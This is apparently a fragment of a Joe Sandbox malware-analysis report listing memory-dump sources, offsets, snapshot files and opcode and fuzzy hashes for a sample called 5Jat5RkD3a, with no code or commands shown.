                                                              • Opcode ID: 00a4f07f8a20c3b0e0fdd27fe8ec0cc4248a9b51b2caf3f966bae15a58e4d375
                                                              • Instruction ID: 864e4138dc02a442e490703efa98be373cf8d4f45de084337d9ddf48034571d1
                                                              • Opcode Fuzzy Hash: 00a4f07f8a20c3b0e0fdd27fe8ec0cc4248a9b51b2caf3f966bae15a58e4d375
                                                              • Instruction Fuzzy Hash: 57113AF781C210EDF701C2515A987FE3B6DD797330F308626F45B961C2D29C0A0599B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561606383.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7000000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6557539f80ed9733358451947f4dbe957c96211912d3ffb712b3dfbcd16e75b
                                                              • Instruction ID: 2a1c4a386a40c0f6f614c0459894a44e720501fb5ed4c29ea616b65edb2ae245
                                                              • Opcode Fuzzy Hash: d6557539f80ed9733358451947f4dbe957c96211912d3ffb712b3dfbcd16e75b
                                                              • Instruction Fuzzy Hash: AA11E6F782C251ADF702C5415A987FE3B5DA783330F308626F55B95581D29C0A05AAB2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                              • Instruction ID: 4566ed69873296b6414b981f68d7567bb594dd99c25648d4f7cb7c91dd48523b
                                                              • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                              • Instruction Fuzzy Hash: DBF0AF33B612390B9360CDB66C001D6A6C3B7C0370F1F89A5EC44E7642E9348C4686C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                              • Instruction ID: 88cc43628c5ba774613f07d96700317afad71d3e67205787ce59273a8d240ee1
                                                              • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                              • Instruction Fuzzy Hash: 76F08C33A20A340B6360CC7A8D05097A2C7ABC86B0B0FC969ECA0E7206E930EC0656D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e15e2e4350f3a1fe3d9e85e328810897b200c582133f8a20e818cee136e95db
                                                              • Instruction ID: 33f84a74cd38f0e32de83e7bc6e70b6e8025095a9546c52407a6f1ac70d61682
                                                              • Opcode Fuzzy Hash: 9e15e2e4350f3a1fe3d9e85e328810897b200c582133f8a20e818cee136e95db
                                                              • Instruction Fuzzy Hash: 12B012319142008B9B17CA38ED7149172B273B2304355C4EED00345021D739D0178604
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: [
                                                              • API String ID: 0-784033777
                                                              • Opcode ID: 246df0f6da4f3f89abb09f0a584ececd5691afc4d654059513988d51c585fd19
                                                              • Instruction ID: 112c2001e085264f4bcb558016860119f3776204d5155b8a40a653800cae68b2
                                                              • Opcode Fuzzy Hash: 246df0f6da4f3f89abb09f0a584ececd5691afc4d654059513988d51c585fd19
                                                              • Instruction Fuzzy Hash: 97B166719383835BDB349E24889C77ABBD8EB55308F18052FE8C5C6381EB79DC648752